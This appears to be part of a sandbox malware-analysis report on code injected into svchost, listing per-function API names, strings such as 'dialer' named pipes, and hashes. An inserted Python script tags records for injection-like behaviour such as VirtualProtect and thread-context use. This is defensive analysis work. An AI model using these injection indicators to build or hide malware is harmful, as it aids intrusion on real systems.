                                                                      • Instruction ID: dc5baa9e4900bccee7b18694ed6ad8fc180f2675819547d15587c8c5e04f39b1
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 7FE1D472606B408AEBA0DF65DE40BDD77ECF756B98F102115EE8A57BA9CB78C181C700

                                                                      Control-flow Graph

                                                                      • Interactive graph of the function at 14e25edf394 (basic-block list not reproduced); API calls shown in the graph: LoadLibraryExW, GetLastError, GetProcAddress, FreeLibrary
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 22fee92a7b634e20b8207f9d96fbe19373ab9512f5f1e434ffbaebbadbf46c39
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: BA41C432322A1051EA96CF16AE00FE923DDBB46BE0F196129DD1F877A5EEB8C4458301

                                                                      Control-flow Graph

                                                                      • Interactive graph of the function at 14e25ed104c (basic-block list not reproduced); API calls shown in the graph: RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc, HeapFree
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: d53801182b1a1fddabf9b2cb97fa914ecb6b5c17acb5066caa3a10faa4a8568e
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: DE418073214B84C6E7A4CF21E94479E77E9F389B98F148129DB8A07B68DF78C549CB00
                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EDC7DE,?,?,?,?,?,?,?,?,0000014E25EDCF9D,?,?,00000001), ref: 0000014E25EDD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 67d499ed1cae324e52016772c9b3e2eb920b02c753671c71406fddec84103b65
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: 0511633070664441FAE89B359F51BED62CEBB877F0F546324983B066FADEE9C8028301
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: eec92c873ab8a8532cd6d95de1f2b50f3b3f0ee532591f7514190b140d4d18b8
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 20811E71A1224186FBD0AB25AE43FD922DDBB87780F146425AA4B437F7EBF9C841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 4b673a47d5b222b7fe4c6400c13b60ea41fad0e13ee299185a4e4a279635b7ed
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 4731C731313640E1EEA2DB42AE00FE962DCB759BB0F5916259D1F8B3B5EFB9C5458300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: dac870ae50dc774142f57e224bcde91fef96868b3a026d0ca4bce480cb7abb85
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: D6115E31220B4086E7A18B52F944B5976E8F788FF4F144214EA5F877B5DFB8C5148740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 2d2ae68968ed466a8bd9f8edaa945d4ff509ed3e6404d4b55c90d98096d8e2c2
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 58118E7A321B4082EF949B11F904AA9B3E8F789B94F140028DE8A037A5EF7DC505C704
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: dbf7c04510264e3aa80be77e2b965e56a4bbf761f2bbcec70d3958daf628b150
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 9AD1BA76219B8881DAB09B06E99079A77E8F3C9B84F101116EACE47BB5DF7CC551CB00
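
A disassembly section this long is easier to triage by machine than by eye. The script below is an added example by the editor, not Joe Sandbox code and not part of this report: it parses the per-function fields printed above (Source File, API ID, String ID, API String ID, Opcode ID), tags each record with a few behaviour heuristics of the editor's own choosing, and pairs records that carry the same API String ID at different dump bases of one process. The five sample records are copied from this section; the tag names and rules are the editor's assumptions, not Joe Sandbox signatures, and flattening the `$`-grouped API ID into a bag of words is a simplification of Joe Sandbox's own grouping. Two facts the rules rely on: `csm` is the ASCII view of the MSVC C++ exception code 0xE06D7363, so the two `csm$csm$csm` records are C runtime exception-handling code, and strings such as `api-ms-`/`ext-ms-` belong to the runtime's API-set resolution, not to the payload.

```python
"""Triage helper for Joe Sandbox "Disassembly" records. Editor's added example,
not Joe Sandbox code: parses the per-function fields the report prints, applies
the editor's own behaviour heuristics, and pairs copies of one function that
appear at different dump bases of the same process."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: five records copied from this report, trimmed to the
# fields used here. A whole report section can be fed in the same way.
SAMPLE = r"""
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
• Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
"""

FIELD_RE = re.compile(r"^\s*•\s*(Source File|API String ID|API ID|String ID|Opcode ID):\s*(.*?)\s*$")
SOURCE_RE = re.compile(r"^([0-9A-Fa-f]{8})\..*?Offset:\s*([0-9A-Fa-f]+)")
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z][a-z0-9_]*")


@dataclass
class Record:
    process: str            # first dotted field of the dump name (process index)
    base: str               # dump base taken from "Offset:"
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    opcode_id: str = ""


def parse_records(text: str) -> list[Record]:
    """One Record per 'Source File' header; the fields that follow attach to it."""
    records: list[Record] = []
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            src = SOURCE_RE.match(value)
            if src:
                records.append(Record(process=src.group(1), base=src.group(2).upper()))
        elif records:
            setattr(records[-1], key.lower().replace(" ", "_"), value)  # "API String ID" -> api_string_id
    return records


def api_tokens(api_id: str) -> set[str]:
    """Bag of CamelCase words from the '$'-grouped API ID (flattening is this example's simplification)."""
    return set(TOKEN_RE.findall(api_id))


def classify(rec: Record) -> list[str]:
    """Editor's heuristics, not Joe Sandbox signatures. 'crt-*' marks MSVC runtime
    code worth skipping: 'csm' is the ASCII view of the C++ exception code 0xE06D7363."""
    t, s, tags = api_tokens(rec.api_id), rec.string_id, []
    if "FrameHandler3" in rec.api_id or "csm" in s.split("$"):
        tags.append("crt-exception-handling")
    if {"Process", "Write", "Thread"} <= t and "\\pipe\\" in s:
        tags.append("child-process-plus-named-pipe")
    if "Wow64" in t:
        tags.append("cross-bitness-process-handling")
    if {"Thread", "Context"} <= t:
        tags.append("thread-context-manipulation")
    if {"Virtual", "Protect", "Module"} <= t:
        tags.append("module-memory-reprotect")
    return tags


def relocated_copies(records: list[Record]) -> dict[tuple[str, str], dict[str, set[str]]]:
    """(process, API String ID) -> {base: {opcode ids}} for IDs seen at more than one
    dump base. The API String ID survives relocation; the Opcode ID need not."""
    seen: dict[tuple[str, str], dict[str, set[str]]] = defaultdict(lambda: defaultdict(set))
    for r in records:
        if r.api_string_id:
            seen[(r.process, r.api_string_id)][r.base].add(r.opcode_id)
    return {k: dict(v) for k, v in seen.items() if len(v) > 1}
```

Run against this section, `classify` leaves the two `csm` records with only a `crt-` tag and flags the named-pipe/Wow64 function, the VirtualProtect-on-module function and the thread-context function as the ones to open first, which lines up with the behaviours listed at the top of the report. `relocated_copies` pairs the two `csm$csm$csm` records: same process (00000028, the svchost dump), same API String ID 849930591-393685449, but bases 0000014E255D0000 and 0000014E25ED0000 and different Opcode IDs, so the pairing keys on the API String ID rather than on opcode identity.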
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 84f0a49ae497355131a2aac26c953b08be1bccc37f8d4e7dda7159b87278197d
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 5B31C732712B6183EB95CF16EE40BA9A7DDFB45B90F0854249E4A47B76EF75C461C300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 471d6bd78421e7f0d323d5dd982a26040bfcc08c4fbacc160c0418542b83e496
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: 05115E3020224481FAE99B219F45BED61CEBB877F0F146724A837467F6DEE988019341
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: ca7a516169cdbcbbb0f1702b00ec33b0ff134d6781b8bdceb78e20af0a0e2d48
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 5F016971710B4082EBA4DB52B948B9963E9F788BD4F984035DE4E43766DF7CC989C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: cd6817a2b86cb7a5d2c6d38da5d770d31958944fdfcb510b49edaf7ad4408b8a
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: C6012DB5222B4082FFA59B21FD08B9A73E8BB49B96F140528CD4A07775EFBDC1088700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 9b2a1657cc1f5397dbb91559528021781e071057780ce7782a4c857206022f56
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 2751BD327126018AEB94DF15EE48F9837DEF366B98F129524DA47877ACEBB5C841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: d85250e2fd4da4f793b085a3e5f2ae8afe95a5ea4a6e7ad585896a302fadfb02
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: C431CB3221274086E790DF11ED08B9937ECF356B98F168414EE8B837A9CBB9C940C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: eb17f0113111d357bb3c0c2e1e39b944648b27065071a28b27f10ee0fb883d04
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: 6EF0A47271064082EBB08F20FA84B9963A8F74CBA8F944020CA4A46A65DFBCC64DCB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: ae1ffe23413f3f9ac290ddb9a375ecfb0d94467b0eec39550c61245b0545be19
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: FAF0F6B132270581EF508F24F944B9923ACFB89770F601219CA6B051F4DFBCC044C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: a8a97001e52402dc951ae60ecd85aaaa03d7a8c3e915bbc4e21f66f82a1337c1
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 0AF08270324B8082EE908F13BB0459962A9BB8CFE0F185130EE4707B39DFBCC8458700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: f51a204a033d80b8679267c1f31be89dd82c60e0a798355614f27ff34b059d90
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: 1102CD32619B8486D7A0CB55F99079AB7F8F3C5794F105016EA8E47B68DFBDC854CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: d9fcac21c386e716bf48634b26dfdb2d1c4fc5b9b771d717854196da0f0511ca
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: AD61AC3651AB44C6E7A4CB15E984B5A77E8F389794F102116EA8E47BB8DBBCC950CF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 963a1978ace91ebc5c95c6f5ace322840b4e8d1a0b49158cfbdd5de4de91675c
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: D011E333EF0A0351FA641128E741BE916C97B59371F7B863AA96B063F6CAF4E8424300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 0b394f0222ad10ed4458312801fa377dc5de40dcb936ecf53148d1b0853e27b0
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 98119E32A30F5021FFE41568EE56BE911C97FAC3B8F380664A977466F68AA8C9414304
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: 9797d107109e69bce09e45c8849dd5af6dda54904592a7202821d35037d3ca46
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 0E61D233E8264282FA659BA4EF44FEE66E9FB87780F544519CA0B037B4DBB4D841C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: fdb2a3d7d4dbc778feb0db44ec4dd92249fa2fb54b61256c6ae827feb09f3166
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: F061AE33A02B488AEB50DF65D940BDD77E9F345B98F046215EF4A17BA8DBB8C185C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
